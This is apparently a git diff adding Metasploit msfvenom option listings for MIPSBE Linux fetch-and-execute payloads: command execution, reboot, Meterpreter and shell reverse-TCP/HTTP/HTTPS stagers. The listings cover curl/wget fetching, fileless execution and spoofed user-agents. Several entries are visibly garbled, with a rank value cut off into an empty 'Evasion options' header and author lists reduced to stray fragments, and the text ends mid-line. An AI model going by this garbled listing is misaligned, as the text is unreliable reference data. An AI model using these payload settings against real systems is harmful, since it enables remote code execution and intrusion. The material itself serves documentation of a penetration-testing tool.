the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-exec.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-exec.txt new file mode 100644 index 0000000..2bd17b3 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-exec.txt @@ -0,0 +1,69 @@ + + Name: HTTP Fetch, Linux Execute Command + Module: payload/cmd/linux/http/mipsbe/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + entropy + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME liEefdOwA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + + A very small shellcode for executing commands. + This module is sometimes helpful for testing purposes. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..b9fbad2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter-reverse_tcp.txt @@ -0,0 +1,100 @@ + + Name: HTTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/http/mipsbe/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Norm +Evasion options for payload/cmd/linux/http/mipsbe/meterpreter/reverse_tcp: +========================= + + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME EjqTwHWHT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_http.txt new file mode 100644 index 0000000..e0e9270 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mipsbe/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/mipsbe/meterpreter_reverse_http: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME OJApyhagJby no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_https.txt new file mode 100644 index 0000000..0282c82 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mipsbe/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/http/mipsbe/meterpreter_reverse_https: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ICLFrRDOUN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..d9f6ada --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-meterpreter_reverse_tcp.txt @@ -0,0 +1,97 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/mipsbe/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME QibeYbciB no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-reboot.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-reboot.txt new file mode 100644 index 0000000..765a6f0 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-reboot.txt @@ -0,0 +1,69 @@ + + Name: HTTP Fetch, Linux Reboot + Module: payload/cmd/linux/http/mipsbe/reboot + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + rigan - + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME vwzXdDryf no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + + A very small shellcode for rebooting the system. + This payload is sometimes helpful for testing purposes or executing + other payloads that rely on initial startup procedures. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-mipsbe-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-mipsbe-shell-reverse_tcp.txt new file mode 100644 index 0000000..a937471 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-mipsbe-shell-reverse_tcp.txt @@ -0,0 +1,91 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/http/mipsbe/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME uTHuAvxylJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is 